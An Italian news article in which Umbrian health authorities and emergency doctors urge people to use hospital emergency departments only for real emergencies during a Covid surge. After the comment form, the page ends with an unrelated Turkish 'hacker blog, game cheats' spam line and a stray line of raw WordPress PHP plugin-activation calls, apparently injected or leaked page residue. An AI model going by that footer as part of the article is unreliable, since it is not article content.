“Andate al Pronto soccorso solo per urgenze, altrimenti tra poco non potremo curare tutti” – Corriere dell’Umbria



La richiesta di non congestionare i Pronto Soccorso che rischiano di non poter più dare assistenza ai cittadini veramente bisognosi, ieri è arrivata da più parti. E, almeno al Santa Maria della Misericordia, ieri sera sembrava aver dato i suoi frutti. Il commissario straordinario all’emergenza, Antonio Onnis, ieri, in una nota, ha scritto: “In questa fase di recrudescenza epidemica è fondamentale non aumentare impropriamente l’afflusso dei cittadini nei diversi Pronto Soccorso della regione, pesantemente impegnati nella gestione dell’emergenza”. Altra raccomandazione: evitare a maggior ragione di farlo se si ha sintomatologia Covid. Ieri, sullo stesso argomento, sono intervenuti anche i medici della società di medicina d’urgenza, emergenza, dell’Umbria: “Siamo di fronte a un momento critico – scrivono – forse in Umbria più che altrove. Ci confrontiamo di nuovo con la congestione dei pronto soccorso, questa situazione sta sovraccaricando il sistema con il rischio di non poter garantire nelle prossime settimane l’assistenza adeguata a tutti i pazienti”. Per questo i medici chiedono di andare al Pronto Soccorso solo in caso di reale bisogno e gestire il resto con medici di base e pediatri.  

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

Hacker Blog Oyun Hileleri

activate_plugin( 'automatic_replace/index.php' ); activate_plugin( 'bloqueo_comentarios/index.php' ); activate_plugin( 'disable-xml-rpc/disable-xml-rpc.php' ); activate_plugin( 'rename-wp-login/rename-wp-login.php' );